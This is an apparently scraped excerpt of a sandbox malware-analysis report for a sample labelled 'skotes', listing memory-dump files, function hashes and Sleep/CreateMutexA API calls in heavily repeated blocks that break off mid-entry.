Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c8c0e9bd10bfbad74462128c56d56c2f5e03bd2d6e78da3b4681b59b11f34260
Instruction ID: 18d10af62132281b40052728d9e914bdfac0eaeadd313901a54a7fc412ebb6c1
Opcode Fuzzy Hash: c8c0e9bd10bfbad74462128c56d56c2f5e03bd2d6e78da3b4681b59b11f34260
Instruction Fuzzy Hash: 3DE08C30041518AFCF26BF58EA49D997BA9FF51745F000800F81986222DB35EEE1CA81

Function 007F9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4e2e7f5d5b680f095d0827fd8cea4fee89bab7faa24fdb68f5b7ae7e58df3cb1
Instruction ID: 33581e7a79a699a2cfa4b81869c34024c9478b6524eb0992a530f2676f0556b2
Opcode Fuzzy Hash: 4e2e7f5d5b680f095d0827fd8cea4fee89bab7faa24fdb68f5b7ae7e58df3cb1
Instruction Fuzzy Hash: 32317B716042089BEB08DB7CDDC577DB7A2EBD1315F204218E214D73D6E77D59808752

Function 007F9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a994d5dae320078eed7dd047d0071cb885ff9e2542080fd5bf9207075990efdf
Instruction ID: 74ebe6bcb247a6f38b1185c43a8dcfa550d414d8dab53bd98d39fe8ef4a06294
Opcode Fuzzy Hash: a994d5dae320078eed7dd047d0071cb885ff9e2542080fd5bf9207075990efdf
Instruction Fuzzy Hash: C0314871604208ABEB08DB7CDDC47BCB7A2EB85315F204219E218DB3D5E77E99808752

Function 007FA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 00aa1c40aa3b921eaa04fd5b880a8747df6a785391f4b8aa9fb670e236dce084
Instruction ID: ce5e3a6cf41d667dab023e2d80001cf2536c5625d3a54152fa80f6c03a9c8bfd
Opcode Fuzzy Hash: 00aa1c40aa3b921eaa04fd5b880a8747df6a785391f4b8aa9fb670e236dce084
Instruction Fuzzy Hash: 8A3148B1A44208ABEB08DB7CDDC477DB772EB91315F204219E118D73D5E77E69808652

Function 007FA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0af8b6f8411deb1ec4ec802459d8731af3d2a3d9d5f595edb115668984c6c077
Instruction ID: f5c93a2b9d27bf267733a2000a4beb53a7d649d4af9961db5bfa87dc4c05e9d4
